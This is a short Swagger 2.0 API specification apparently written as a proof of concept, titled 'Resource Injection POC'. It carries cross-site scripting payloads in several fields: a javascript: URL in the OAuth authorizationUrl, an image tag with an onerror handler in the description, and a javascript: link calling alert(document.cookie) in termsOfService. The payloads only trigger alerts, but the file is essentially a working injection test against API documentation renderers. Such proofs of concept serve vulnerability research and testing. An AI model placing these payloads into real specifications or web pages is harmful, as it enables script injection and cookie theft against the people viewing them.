swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Resource Injection POC
  description: <img src="https://static01.nyt.com/images/2019/10/06/arts/06jokers-ranked-ledger/06jokers-ranked-ledger-videoSixteenByNine3000.jpg?year=2019&h=1688&w=3000&s=f994d2a0d1a128eb7c2743e951c239765ba810b5bec002be592d2e20a895021e&k=ZQJBKqZ0VN&tw=1" onerror=alert(1)>
  termsOfService: "javascript:alert(document.cookie)"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
